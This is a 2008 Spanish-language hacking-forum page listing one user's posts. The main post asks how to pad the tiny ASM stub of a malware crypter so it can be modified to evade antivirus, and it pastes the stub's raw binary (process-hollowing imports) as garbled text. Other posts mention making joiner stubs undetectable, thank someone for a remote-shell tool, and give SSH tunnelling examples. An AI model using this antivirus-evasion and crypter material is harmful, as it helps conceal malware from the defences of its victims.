elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
13 Octubre 2008, 18:07  



  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15
1  Seguridad Informática / Análisis y Diseño de Malware / Re: Abrir Puertos (Todos los Routers) en: 11 Septiembre 2008, 10:12
TP- link?
2  Seguridad Informática / Seguridad / Re: Nueva encuesta: Mejor Firewall en: 20 Agosto 2008, 12:18
el de kasparsky es lejos el mejor no te lo matan y por otro lado detecta la inyeccion invencible
3  Seguridad Informática / Análisis y Diseño de Malware / Haciendo el Small CRYPTER indetectable en: 13 Junio 2008, 23:03
Como ya casi todos saben hace algún tiempo se posteo y dejo como pined este increíble programa de E0n en el que el stub estaba echo en ASM con tan solo 1kb de peso  :o, enseguida quise aplicarle el método de redirección de flujo pero me lleve la sorpresa de que el stub queda inservible al hacerle agujero ya que al agregarle tamaño (tiene 0 espacio vacio) debería de modificarse también algo al código, yo personalmente he mirado mucho el código para poder hacer el agujero sin encontrar la variable a modificar, por eso quería preguntarle a los expertos de ASM como podría hacerle el ollo dejándolo totalmente funcional, que un crypter tan bueno como este no merece q sea detectado sin poderle hacer rit, saludos


Stub.dll sin ollo funcional 1,33kb

Citar
MZ€      ÿÿ  @      @                                   €   º ´   Í!¸LÍ!This program cannot be run in DOS mode.
$        PE  L ´ñ   H        à  C                         @                     [     ”4                                 ƒ  Ù                                                                                                                  .e0n    \     [                 `  à                                                                                                ƒì‰åÇE[  h   j@ÿ@ ‰Çhÿ  Wj ÿ@ jDj@ÿ@ ‰ëƒÃSPj j jj j j Wj ÿ@ j j jj j h   €Wÿ@ ‰ÆWÿB@ j Vÿ"@ ‰ÇWj@ÿ@ ‰E j h@ Wÿu Vÿ&@ Vÿ>@ ‹E E+}1ö€01@F9þu÷‹EE ‰E ‰ÃƒÃ<‰Çÿw4ÿuÿ<@ j@h 0  ÿwPÿw4ÿuÿ*@ h@ ÿwTÿu ÿw4ÿuÿ.@ ‰þÆø   1Û‹G4F ‹NM h@ ÿvQPÿuÿ.@ ƒÆ(fCf;_uÖhÌ   j@ÿ@ ‰ÆÇ  Vÿu ÿ2@ ‹_4_(‰ž°   Vÿu ÿ6@ ÿu ÿ:@ ÿ6ÿB@ j ÿF@     Ö          ¿    4          Ì  <                      KERNEL32.DLL NTDLL.DLL N  \  r  „  ’     ¬  ¾  Ô  è  ü      &      N  \  r  „  ’     ¬  ¾  Ô  è  ü      &        LocalAlloc    GetModuleFileNameA    CreateProcessA    CreateFileA   GetFileSize   ReadFile    VirtualAllocEx    WriteProcessMemory    GetThreadContext    SetThreadContext    ResumeThread    CloseHandle   LocalFree   ExitProcess D      D        ZwUnmapViewOfSection


Stub.dll con ollo inservible 2kb

Citar
MZ€      ÿÿ  @      @                                   €   º ´   Í!¸LÍ!This program cannot be run in DOS mode.
$        PE  L ´ñ   H        à  C                         @                     [/     ”4                                 ƒ  Ù                                                                                                                  .e0n    \     [                 `  à.topo0  È                            à                                                        ƒì‰åÇE[  h   j@ÿ@ ‰Çhÿ  Wj ÿ@ jDj@ÿ@ ‰ëƒÃSPj j jj j j Wj ÿ@ j j jj j h   €Wÿ@ ‰ÆWÿB@ j Vÿ"@ ‰ÇWj@ÿ@ ‰E j h@ Wÿu Vÿ&@ Vÿ>@ ‹E E+}1ö€01@F9þu÷‹EE ‰E ‰ÃƒÃ<‰Çÿw4ÿuÿ<@ j@h 0  ÿwPÿw4ÿuÿ*@ h@ ÿwTÿu ÿw4ÿuÿ.@ ‰þÆø   1Û‹G4F ‹NM h@ ÿvQPÿuÿ.@ ƒÆ(fCf;_uÖhÌ   j@ÿ@ ‰ÆÇ  Vÿu ÿ2@ ‹_4_(‰ž°   Vÿu ÿ6@ ÿu ÿ:@ ÿ6ÿB@ j ÿF@     Ö          ¿    4          Ì  <                      KERNEL32.DLL NTDLL.DLL N  \  r  „  ’     ¬  ¾  Ô  è  ü      &      N  \  r  „  ’     ¬  ¾  Ô  è  ü      &        LocalAlloc    GetModuleFileNameA    CreateProcessA    CreateFileA   GetFileSize   ReadFile    VirtualAllocEx    WriteProcessMemory    GetThreadContext    SetThreadContext    ResumeThread    CloseHandle   LocalFree   ExitProcess D      D        ZwUnmapViewOfSection                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   
4  Seguridad Informática / Análisis y Diseño de Malware / Re: Tutorial: Haciendo el Small Joiner indetectable (tres formas) en: 13 Junio 2008, 21:25
No entendí el post de MadAntrax :P

Lo dices enserio? Creo haber sido bastante explícito, aunque lo puedo resumir para que se entienda mejor...

Para conseguir que el stub.dll del Joiner de E0N sea indetectable podemos usar varios métodos "manuales" que ya se han posteado (recompilar con ASM, metodo octalh, modificar con Olly Dbg, editándolo hexadecimalmente, etc...)

O podemos usar el Cactus Metamorph para conseguir el mismo resultado en sólo 5 segundos y sin despeinarse. Ademas, con Metamorph obtendrás un stub.dll siempre distinto e indetectable, haciendo que tu copia del Stub.dll sea única al resto.

Saludos :)

Me pregunto si este procedimiento podrá hacer algo con el stub de small CRYPTER que no he podido hacerle ollo, me lo deja inservible y viene con 0 espacio =S. Hace tiempo tengo muchas ganas de trabajar en el pero no he podido...
5  Seguridad Informática / Análisis y Diseño de Malware / Re: Sobre lammers y este subforo... en: 11 Junio 2008, 21:34
Yo respondería a la pregunta de este tema tema diciendo; Cuando conoces el peligro de cerca es más fácil combatirlo ya que conoces muy bien como trabaja y como podría llegar a afectarte, podrías conocer la manera de como confrontarlo y no tan solo en este ámbito sino que en todo el hacking en general, esa ha sido mi apreciación personal respecto de este tema, le encuentro mucha razón a E0n de igual manera.. y por que no decirlo a mi también me gustaría ser moderador, Saludos :)
6  Seguridad Informática / Análisis y Diseño de Malware / Re: Virus devastador ? en: 11 Junio 2008, 01:35
Yo de todos los pc que he perturbado que son muchos simplemente les corrompo el firmware de la bios y punto xDD no puede ser más fácil no botea unidades por lo menos..

PD: los de los pc era broma
7  Seguridad Informática / Hacking Básico / Re: Pasar todo el PC por una proxy en: 07 Junio 2008, 22:36
alguien podría subir el programa, el free caps no me ha funcionado y no puedo probar el sockscap por que no esta por ningún lado. Es acaso posible hacer algo apra pasar todo por proxy sin necesidad de ocupar programas específicos??
8  Seguridad Informática / Hacking Avanzado / Re: Tunel inverso con Reverse proxy multithreading Engine de Andrés Tarascó en: 26 Mayo 2008, 05:15
La idea de usar redireccion es para que unicamente abras en el router el puerto 22 y lo redirijas a tu servidor. Todos los demas puertos cerrados. Y si quieres acceder a cualquier otro servicio del servidor, pues creas un tunel. O tambien puedes crearlo para acceder a otro equipo.

Por ejemplo ... suponemos:

IPs privadas:
router: 192.168.1.1 (con el 80 abierto para la red privada y el 22 redirigido al servidor)
servidor: 192.168.1.20 (con linux y el 22 y el 80 abierto)
pc: 192.168.1.100 (con windows y el 139 abierto)

IP publica del router:
195.195.195.195

Nuestros accesos son todos DESDE FUERA DE LA RED PRIVADA y a traves de Internet.

Para acceder por ssh al servidor:
ssh 195.195.195.195
Seria una conexion SSH normal y corriente

Para acceder a la web del router, como si estuvieras dentro de la red:
ssh -L 8080:192.168.1.1:80 195.195.195.195
Accederias como http://localhost:8080 y lo que hacemos es crear un tunel con el servidor

Para acceder a la web del servidor, como si estuvieras dentro de la red:
ssh -L 8080:192.168.1.20:80 195.195.195.195
Accederias como http://localhost:8080 y lo que hacemos es crear un tunel con el servidor

Para acceder al 139 del pc con windows:
ssh -L 139:192.168.1.1:139 195.195.195.195
con samba podremos acceder a localhost y en realidad estaremos en el PC con windows de la red privada

Para aclarar como funciona:

X:IP_PRIVADA:Y
X es el puerto virtual que crearemos en localhost
IP_PRIVADA es a la que queremos acceder
Y: es el puerto abierto en la IP_PRIVADA

Lo que hace esto es que conectandonos a localhost:X en realidad accedemos a IP_PRIVADA:Y

Y para acceder nos connectamos, autenticamos y creamos un tunes a traves de 195.195.195.195 que es la IP publica del router que nos lleva al servidor (dado que el puerto 22 del router esta redirigido al servidor.




entiendo lo que tu dices pero no es eso lo que se quiere lograr, ojala se entienda mejor mirando este post

http://foro.elhacker.net/redes/redirigir_conexiones_a_modo_clienteservidor_dibujo-t212437.0.html
9  Comunicaciones / Redes / Re: Redirigir conexiones a modo cliente-servidor (DIBUJO) en: 26 Mayo 2008, 05:12
necesito algo automatico que enlace

ambos ekipos

desde un intermediario

que el intermediario conecte ambos en una session

como en la conexión inversa que el cliente conecta al servidor pero aki ambos tendrian que hacerlo

yo <---- > puente <----- > objetivo

el puente tiene que enlazarlos a ambos

en una sola conexión


10  Seguridad Informática / Análisis y Diseño de Malware / Re: Mini AV Scanner v1.0 Public by iNs en: 26 Mayo 2008, 04:29
muchas gracias de seguro que me servira mucho, saludos
11  Comunicaciones / Redes / Redirigir conexiones a modo cliente-servidor (DIBUJO) en: 15 Mayo 2008, 08:34
hola necesito un programa que sea de consola que me permita redirigir conexiones a modo cliente -servidor para que me entiendan mejor desarrolle el siguiente dibujo:



La idea es recibir conexiones de vnc sin necesidad de abrir los puertos del router al que estoy conectados, viajo mucho y ese es un inconveniente


dispongo de una maquina servidor con puertos abiertos para que los clientes al intentar conectarse a esa ip automáticamente el servidor las redireccione hacia mi pero no por conexión directa ya que no se puede, me envíe esas conexiones por una conexión directa establecida previamente con este, ojala me entiendan los expertos aunque se que esta un poco enredado, saludos amantes de las redes
12  Forums Generales / Foro Libre / Re: La gente que desprecia a linux en: 11 Mayo 2008, 12:40
resulta increíble como opinan acerca de linux sin ni siquiera conocerlo
13  Sistemas Operativos / GNU/Linux / Re: canal 0, ubuntu 8.04 3945 en: 11 Mayo 2008, 12:33
fíjate cuando inicias el modo monitor con el airmon-ng el canal que le asignes.
14  Seguridad Informática / Análisis y Diseño de Malware / Re: Nircmd es posible Troyanizar??? en: 11 Mayo 2008, 12:23
me viene muy bien el aporte hace tiempo que quiero conseguir algo sencillo que me de shell remota, gracias
15  Seguridad Informática / Análisis y Diseño de Malware / Re: Synapse Zombie ( Backdoor lan to lan) en: 11 Mayo 2008, 08:53
al final en que quedo este tema recuerdo que esta de hace mucho
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15






Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC